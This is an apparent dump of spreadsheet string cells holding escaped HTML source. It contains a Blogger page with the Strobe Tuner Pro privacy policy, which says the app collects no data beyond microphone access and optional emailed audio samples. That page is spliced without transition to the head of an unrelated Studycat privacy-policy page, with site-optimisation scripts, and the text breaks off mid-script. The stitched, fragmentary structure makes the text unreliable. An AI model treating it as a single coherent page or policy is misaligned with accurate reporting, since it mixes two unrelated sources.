&lt;div class='fauxcolumn-outer fauxcolumn-center-outer'&gt;
&lt;div class='cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left'&gt;
&lt;div class='fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='fauxcolumn-inner'&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxcolumn-outer fauxcolumn-left-outer'&gt;
&lt;div class='cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left'&gt;
&lt;div class='fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='fauxcolumn-inner'&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxcolumn-outer fauxcolumn-right-outer'&gt;
&lt;div class='cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left'&gt;
&lt;div class='fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='fauxcolumn-inner'&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;! -- corrects IE6 width calculation --&gt;
&lt;div class='columns-inner'&gt;
&lt;div class='column-center-outer'&gt;
&lt;div class='column-center-inner'&gt;
&lt;div class='main section' id='main' name='Main'&gt;&lt;div class='widget Blog' data-version='1' id='Blog1'&gt;
&lt;div class='blog-posts hfeed'&gt;
          &lt;div class="date-outer"&gt;
          &lt;div class="date-posts"&gt;
&lt;div class='post-outer'&gt;
&lt;div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'&gt;
&lt;meta content='4989376373380229129' itemprop='blogId'/&gt;
&lt;meta content='5819575551483693053' itemprop='postId'/&gt;
&lt;a name='5819575551483693053'&gt;&lt;/a&gt;
&lt;h3 class='post-title entry-title' itemprop='name'&gt;
Strobe Tuner Pro privacy policy
&lt;/h3&gt;
&lt;div class='post-header'&gt;
&lt;div class='post-header-line-1'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='post-body entry-content' id='post-body-5819575551483693053' itemprop='description articleBody'&gt;
&lt;h1&gt;Privacy Policy - Strobe Tuner Pro&lt;/h1&gt;
&lt;p&gt;Effective date: 2021-11-17&lt;/p&gt;
&lt;p&gt;Jan Holešovský (identification number of organization: 02085887, Czech Republic) ("I" or "me") developed and operates applications &lt;b&gt;Guitar and Violin Tuner&lt;/b&gt; and &lt;b&gt;Strobe Tuner Pro&lt;/b&gt;.&lt;/p&gt;
&lt;p&gt; This page declares privacy policy of the &lt;b&gt;Strobe Tuner Pro&lt;/b&gt;</t>
  </si>
  <si>
    <t>application.&lt;/p&gt;
&lt;h2&gt; What information do I collect and how do I use it&lt;/h2&gt;
&lt;p&gt;Strobe Tuner Pro is a premium application that doesn't collect any data and personal information. It doesn't require any permission granted on your device except access to the microphone to be able to measure the incoming audio signal and present the detected frequency and characteristics of the sound in the form that allows you to tune your musical instrument.&lt;/p&gt;
&lt;p&gt;When the user chooses so, they may record an audio sample up to 10 seconds long, and send it via an email either to me, or to other email address they choose.</t>
  </si>
  <si>
    <t>Together with the sample, they may decide to send information like the instrument currently tuned, or the concert pitch frequency that are pre-filled in the email body. The audio sample is not preserved on the device after closing the application.&lt;/p&gt;
&lt;h2&gt; Changes To This Privacy Policy&lt;/h2&gt;
&lt;p&gt;I may update this Privacy Policy from time to time.</t>
  </si>
  <si>
    <t xml:space="preserve">I will notify you of any changes by posting the new Privacy Policy on this page. You are advised to review this Privacy Policy periodically for any changes. These changes are effective immediatelly when published.&lt;/p&gt;
&lt;h2&gt;Contact me&lt;/h2&gt;
&lt;p&gt;If you have any questions about this Privacy Policy, please contact me via email at a4tunelabs@gmail.com.&lt;/p&gt;
&lt;div style='clear: both;'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='post-footer'&gt;
&lt;div class='post-footer-line post-footer-line-1'&gt;
&lt;span class='post-author vcard'&gt;
&lt;/span&gt;
&lt;span class='post-timestamp'&gt;
&lt;/span&gt;
&lt;span class='post-comment-link'&gt;
&lt;/span&gt;
&lt;span class='post-icons'&gt;
&lt;span class='item-control blog-admin pid-1612601926'&gt;
&lt;a href='https://www.blogger.com/page-edit.g?blogID=4989376373380229129&amp;pageID=5819575551483693053&amp;from=pencil' title='Edit Page'&gt;
&lt;img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/&gt;
&lt;/a&gt;
&lt;/span&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/span&gt;
&lt;div class='post-share-buttons goog-inline-block'&gt;
&lt;a class='goog-inline-block share-button sb-email' href='https://www.blogger.com/share-post.g?blogID=4989376373380229129&amp;pageID=5819575551483693053&amp;target=email' target='_blank' title='Email This'&gt;&lt;span class='share-button-link-text'&gt;Email This&lt;/span&gt;&lt;/a&gt;&lt;a class='goog-inline-block share-button sb-blog' href='https://www.blogger.com/share-post.g?blogID=4989376373380229129&amp;pageID=5819575551483693053&amp;target=blog' onclick='window.open(this.href, "_blank", "height=270,width=475"); return false;' target='_blank' title='BlogThis!'&gt;&lt;span class='share-button-link-text'&gt;BlogThis!&lt;/span&gt;&lt;/a&gt;&lt;a class='goog-inline-block share-button sb-twitter' href='https://www.blogger.com/share-post.g?blogID=4989376373380229129&amp;pageID=5819575551483693053&amp;target=twitter' target='_blank' title='Share to Twitter'&gt;&lt;span class='share-button-link-text'&gt;Share to Twitter&lt;/span&gt;&lt;/a&gt;&lt;a class='goog-inline-block share-button sb-facebook' href='https://www.blogger.com/share-post.g?blogID=4989376373380229129&amp;pageID=5819575551483693053&amp;target=facebook' onclick='window.open(this.href, "_blank", "height=430,width=640"); return false;' target='_blank' title='Share to Facebook'&gt;&lt;span class='share-button-link-text'&gt;Share to Facebook&lt;/span&gt;&lt;/a&gt;&lt;a class='goog-inline-block share-button sb-pinterest' href='https://www.blogger.com/share-post.g?blogID=4989376373380229129&amp;pageID=5819575551483693053&amp;target=pinterest' target='_blank' title='Share to Pinterest'&gt;&lt;span class='share-button-link-text'&gt;Share to Pinterest&lt;/span&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='post-footer-line post-footer-line-2'&gt;
&lt;span class='post-labels'&gt;
&lt;/span&gt;
&lt;/div&gt;
&lt;div class='post-footer-line post-footer-line-3'&gt;
&lt;span class='post-location'&gt;
&lt;/span&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='comments' id='comments'&gt;
&lt;a name='comments'&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;/div&gt;
        &lt;/div&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='blog-pager' id='blog-pager'&gt;
&lt;a class='home-link' href='http://www.a4tune.com/'&gt;Home&lt;/a&gt;
&lt;/div&gt;
&lt;div class='clear'&gt;&lt;/div&gt;
&lt;div class='blog-feeds'&gt;
&lt;div class='feed-links'&gt;
Subscribe to:
&lt;a class='feed-link' href='http://www.a4tune.com/feeds/posts/default' target='_blank' type='application/atom+xml'&gt;Posts (Atom)&lt;/a&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='column-left-outer'&gt;
&lt;div class='column-left-inner'&gt;
&lt;aside&gt;
&lt;/aside&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='column-right-outer'&gt;
&lt;div class='column-right-inner'&gt;
&lt;aside&gt;
&lt;div class='sidebar section' id='sidebar-right-1'&gt;&lt;div class='widget Profile' data-version='1' id='Profile1'&gt;
&lt;h2&gt;About A4tune Guitar and Violin Tuner&lt;/h2&gt;
&lt;div class='widget-content'&gt;
&lt;dl class='profile-datablock'&gt;
&lt;dt class='profile-data'&gt;
&lt;a class='profile-name-link g-profile' href='https://www.blogger.com/profile/00681199846778165572' rel='author' style='background-image: url(//www.blogger.com/img/logo-16.png);'&gt;
A4tune Labs
&lt;/a&gt;
&lt;/dt&gt;
&lt;/dl&gt;
&lt;a class='profile-link' href='https://www.blogger.com/profile/00681199846778165572' rel='author'&gt;View my complete profile&lt;/a&gt;
&lt;div class='clear'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;table border='0' cellpadding='0' cellspacing='0' class='section-columns columns-2'&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td class='first columns-cell'&gt;
&lt;div class='sidebar section' id='sidebar-right-2-1'&gt;&lt;div class='widget HTML' data-version='1' id='HTML2'&gt;
&lt;h2 class='title'&gt;Additonal Links&lt;/h2&gt;
&lt;div class='widget-content'&gt;
&lt;a href="http://www.a4tune.com/p/privacy-policy.html"&gt;Privacy Policy&lt;/a&gt;
&lt;/div&gt;
&lt;div class='clear'&gt;&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td class='columns-cell'&gt;
&lt;div class='sidebar section' id='sidebar-right-2-2'&gt;&lt;div class='widget BlogArchive' data-version='1' id='BlogArchive1'&gt;
&lt;h2&gt;Blog Archive&lt;/h2&gt;
&lt;div class='widget-content'&gt;
&lt;div id='ArchiveList'&gt;
&lt;div id='BlogArchive1_ArchiveList'&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate expanded'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy toggle-open'&gt;
        &amp;#9660;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2020/'&gt;
2020
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(3)&lt;/span&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate expanded'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy toggle-open'&gt;
        &amp;#9660;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2020/12/'&gt;
December
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(2)&lt;/span&gt;
&lt;ul class='posts'&gt;
&lt;li&gt;&lt;a href='http://www.a4tune.com/2020/12/guitar-and-violin-tuner-covered-by.html'&gt;Guitar and Violin Tuner covered by Vietnamese media&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href='http://www.a4tune.com/2020/12/strobe-tuner-pro-app-review.html'&gt;Strobe Tuner Pro app review&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2020/04/'&gt;
April
&lt;/a&gt;
 &lt;span class='post-count' dir='ltr'&gt;(1)&lt;/span&gt;
&lt;/li&gt;
&lt;/ul&gt;
 &lt;/li&gt;
&lt;/ul&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2018/'&gt;
2018
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(1)&lt;/span&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2018/04/'&gt;
April
&lt;/a&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;span class='post-count' dir='ltr'&gt;(1)&lt;/span&gt;
&lt;/li&gt;
&lt;/ul&gt;
 &lt;/li&gt;
&lt;/ul&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2017/'&gt;
2017
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(1)&lt;/span&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2017/10/'&gt;
October
&lt;/a&gt;
 &lt;span class='post-count' dir='ltr'&gt;(1)&lt;/span&gt;
&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
&lt;/ul&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2016/'&gt;
2016
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(4)&lt;/span&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2016/12/'&gt;
December
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(1)&lt;/span&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2016/09/'&gt;
September
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(1)&lt;/span&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul class='hierarchy'&gt;
&lt;li class='archivedate collapsed'&gt;
&lt;a class='toggle' href='javascript:void(0)'&gt;
&lt;span class='zippy'&gt;
        &amp;#9658;&amp;#160;
&lt;/span&gt;
&lt;/a&gt;
&lt;a class='post-count-link' href='http://www.a4tune.com/2016/08/'&gt;
August
&lt;/a&gt;
&lt;span class='post-count' dir='ltr'&gt;(2)&lt;/span&gt;
&lt;/li&gt;
&lt;/ul&gt;
 &lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='clear'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;div class='sidebar section' id='sidebar-right-3'&gt;&lt;div class='widget HTML' data-version='1' id='HTML1'&gt;
&lt;h2 class='title'&gt;Follow on Twitter&lt;/h2&gt;
&lt;div class='widget-content'&gt;
&lt;a href="https://twitter.com/A4tune" class="twitter-follow-button" data-show-count="false"&gt;Follow @A4tune&lt;/a&gt;&lt;script async src="//platform.twitter.com/widgets.js" charset="utf-8"&gt;&lt;/script&gt;
&lt;/div&gt;
&lt;div class='clear'&gt;&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;/aside&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style='clear: both'&gt;&lt;/div&gt;
&lt;!-- columns --&gt;
&lt;/div&gt;
&lt;!-- main --&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='main-cap-bottom cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;footer&gt;
&lt;div class='footer-outer'&gt;
&lt;div class='footer-cap-top cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left footer-fauxborder-left'&gt;
&lt;div class='fauxborder-right footer-fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='region-inner footer-inner'&gt;
&lt;div class='foot no-items section' id='footer-1'&gt;&lt;/div&gt;
&lt;table border='0' cellpadding='0' cellspacing='0' class='section-columns columns-2'&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td class='first columns-cell'&gt;
&lt;div class='foot no-items section' id='footer-2-1'&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td class='columns-cell'&gt;
&lt;div class='foot no-items section' id='footer-2-2'&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;!-- outside of the include in order to lock Attribution widget --&gt;
&lt;div class='foot section' id='footer-3' name='Footer'&gt;&lt;div class='widget Attribution' data-version='1' id='Attribution1'&gt;
&lt;div class='widget-content' style='text-align: center;'&gt;
Copyright (c) 2016 A4tune Labs. Travel theme. Powered by &lt;a href='https://www.blogger.com' target='_blank'&gt;Blogger&lt;/a&gt;.
</t>
  </si>
  <si>
    <t>&lt;/div&gt;
&lt;div class='clear'&gt;&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='footer-cap-bottom cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/footer&gt;
&lt;!-- content --&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='content-cap-bottom cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;script type='text/javascript'&gt;
    window.setTimeout(function() {
        document.body.className = document.body.className.replace('loading', '');
      }, 10);
  &lt;/script&gt;
&lt;script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1164795680-widgets.js"&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
window['__wavt'] = 'AOuZoY49MX-P9DsTncbVOzDHCTSvnQ-ZVw:1681341676981';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d4989376373380229129','//www.a4tune.com/p/strobe-tuner-pro-privacy-policy.html','4989376373380229129');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '4989376373380229129', 'title': 'A4tune Guitar and Violin Tuner', 'url': 'http://www.a4tune.com/p/strobe-tuner-pro-privacy-policy.html', 'canonicalUrl': 'http://www.a4tune.com/p/strobe-tuner-pro-privacy-policy.html', 'homepageUrl': 'http://www.a4tune.com/', 'searchUrl': 'http://www.a4tune.com/search', 'canonicalHomepageUrl': 'http://www.a4tune.com/', 'blogspotFaviconUrl': 'http://www.a4tune.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': true, 'httpsEnabled': false, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': 'UA-85277140-1', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22A4tune Guitar and Violin Tuner - Atom\x22 href\x3d\x22http://www.a4tune.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22A4tune Guitar and Violin Tuner - RSS\x22 href\x3d\x22http://www.a4tune.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22A4tune Guitar and Violin Tuner - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/4989376373380229129/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/a34ec09aa0492a70', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'sharing': {'platforms':</t>
  </si>
  <si>
    <t>[{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Share to Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'static_page', 'pageId': '5819575551483693053', 'pageName': 'Strobe Tuner Pro privacy policy', 'pageTitle': 'A4tune Guitar and Violin Tuner: Strobe Tuner Pro privacy policy'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;&lt;script&gt;if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&amp;]nonitro/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?nonitro=1"}else{document.location.href=href.replace("#","?nonitro=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&amp;nonitro=1"}else{document.location.href=href.replace("#","&amp;nonitro=1#")}}}}&lt;/script&gt;&lt;link rel="preconnect" href="https://static.zdassets.com" /&gt;&lt;link rel="preconnect" href="https://www.googletagmanager.com" /&gt;&lt;link rel="preconnect" href="https://cdn-beeel.nitrocdn.com" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="preload" href="https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/static/optimized/rev-372c266/wp-content/themes/studycat2019/fonts/nitro-min-default-Mulish-VariableFont_wght.ttf" as="font" type="font/woff2" crossorigin class="nitro-font-preload" /&gt;&lt;link rel="preload" href="https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/static/optimized/rev-372c266/wp-content/themes/studycat2019/fonts/nitro-min-default-Studycat-Regular.ttf" as="font" type="font/woff2" crossorigin class="nitro-font-preload" /&gt;&lt;meta charset="UTF-8" /&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /&gt;&lt;meta charset="UTF-8" /&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2" /&gt;&lt;meta name="msapplication-TileColor" content="#ffffff" /&gt;&lt;meta name="msapplication-TileImage" content="/ms-icon-144x144.png" /&gt;&lt;meta name="theme-color" content="#ffffff" /&gt;&lt;meta name="wpacu-generator" content="ASSET CLEANUP STYLES PRELOADS" /&gt;&lt;meta name="wpacu-generator" content="ASSET CLEANUP SCRIPTS PRELOADS" /&gt;&lt;title&gt;Privacy Policy for Our Website &amp;amp; Apps - Studycat&lt;/title&gt;&lt;meta name="description" content="Studycat&amp;#039;s privacy policy.</t>
  </si>
  <si>
    <t>This policy covers both our website and language learning apps. Read more about it here." /&gt;&lt;meta name="robots" content="follow, index, max-snippet:-1, max-video-preview:-1, max-image-preview:large" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:locale" content="en_US" /&gt;&lt;meta property="og:type" content="article" /&gt;&lt;meta property="og:title" content="Privacy Policy for Our Website &amp;amp; Apps - Studycat" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:description" content="Studycat&amp;#039;s privacy policy. This policy covers both our website and language learning apps. Read more about it here."</t>
  </si>
  <si>
    <t>/&gt;&lt;meta property="og:url" content="https://studycat.com/about/privacy-policy/" /&gt;&lt;meta property="og:site_name" content="Studycat" /&gt;&lt;meta property="article:publisher" content="https://www.facebook.com/studycat.net/" /&gt;&lt;meta property="og:updated_time" content="2021-08-16T19:42:00+00:00" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:image" content="https://studycat.com/wp-content/uploads/2021/02/cat_privacy.png" /&gt;&lt;meta property="og:image:secure_url" content="https://studycat.com/wp-content/uploads/2021/02/cat_privacy.png" /&gt;&lt;meta property="og:image:width" content="256" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:image:height" content="256" /&gt;&lt;meta property="og:image:alt" content="Studycat - Privacy" /&gt;&lt;meta property="og:image:type" content="image/png" /&gt;&lt;meta property="article:published_time" content="2019-03-27T12:15:12+00:00" /&gt;&lt;meta property="article:modified_time" content="2021-08-16T19:42:00+00:00" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="twitter:card" content="summary_large_image" /&gt;&lt;meta name="twitter:title" content="Privacy Policy for Our Website &amp;amp; Apps - Studycat" /&gt;&lt;meta name="twitter:description" content="Studycat&amp;#039;s privacy policy.</t>
  </si>
  <si>
    <t>This policy covers both our website and language learning apps. Read more about it here." /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="twitter:site" content="@study_cat" /&gt;&lt;meta name="twitter:creator" content="@study_cat" /&gt;&lt;meta name="twitter:image" content="https://studycat.com/wp-content/uploads/2021/02/cat_privacy.png" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="twitter:label1" content="Time to read" /&gt;&lt;meta name="twitter:data1" content="3 minutes" /&gt;&lt;meta name="generator" content="WPML ver:4.6.3 stt:59,61,1,4,28,2;" /&gt;&lt;meta name="wpacu-generator" content="ASSET CLEANUP STYLES MOVED FROM BODY TO HEAD" /&gt;&lt;meta name="msapplication-TileImage" content="https://studycat.com/wp-content/uploads/2020/08/cropped-studycat-270x270.png" /&gt;&lt;meta name="generator" content="NitroPack" /&gt;&lt;script&gt;var NPSH,NitroScrollHelper;NPSH=NitroScrollHelper=function(){var o=null;var r=history.state;var t=r&amp;&amp;typeof r.nitroScrollPos!=="undefined"&amp;&amp;r.nitroScrollPos&amp;&amp;r.nitroScrollPos&gt;0;var e=t?r.nitroScrollPos:0;function l(){if(r!==null){if(typeof r==="object"){r.nitroScrollPos=window.pageYOffset}}else{r={nitroScrollPos:window.pageYOffset}}history.replaceState(r,"")}window.addEventListener("scroll",function(){if(o!==null)clearTimeout(o);o=setTimeout(l,200)},{passive:true});return{isScrolled:function(){return t},getScrollPos:function(){return e}}}();&lt;/script&gt;&lt;script&gt;(function(){var a=false;var e=document.documentElement.classList;var i=navigator.userAgent.toLowerCase();var n=["android","iphone","ipad"];var r=n.length;var o;var d=null;for(var t=0;t&lt;r;t++){o=n[t];if(i.indexOf(o)&gt;-1)d=o;if(e.contains(o)){a=true;e.remove(o)}}if(a&amp;&amp;d){e.add(d);if(d=="iphone"||d=="ipad"){e.add("ios")}}})();&lt;/script&gt;&lt;script type="text/worker" id="nitro-web-worker"&gt;var preloadRequests=0;var remainingCount={};var baseURI="";self.onmessage=function(e){switch(e.data.cmd){case"RESOURCE_PRELOAD":var a=e.data.requestId;remainingCount[a]=0;e.data.resources.forEach(function(o){preload(o,function(e){return function(){console.log(e+" DONE: "+o);if(--remainingCount[e]==0){self.postMessage({cmd:"RESOURCE_PRELOAD",requestId:e})}}}(a));remainingCount[a]++});break;case"SET_BASEURI":baseURI=e.data.uri;break}};async function preload(o,a){if(typeof URL!=="undefined"&amp;&amp;baseURI){try{var e=new URL(o,baseURI);o=e.href}catch(e){console.log("Worker error: "+e.message)}}console.log("Preloading "+o);try{var n=new Request(o,{mode:"no-cors",redirect:"follow"});await fetch(n);a()}catch(e){console.log(e);var r=new 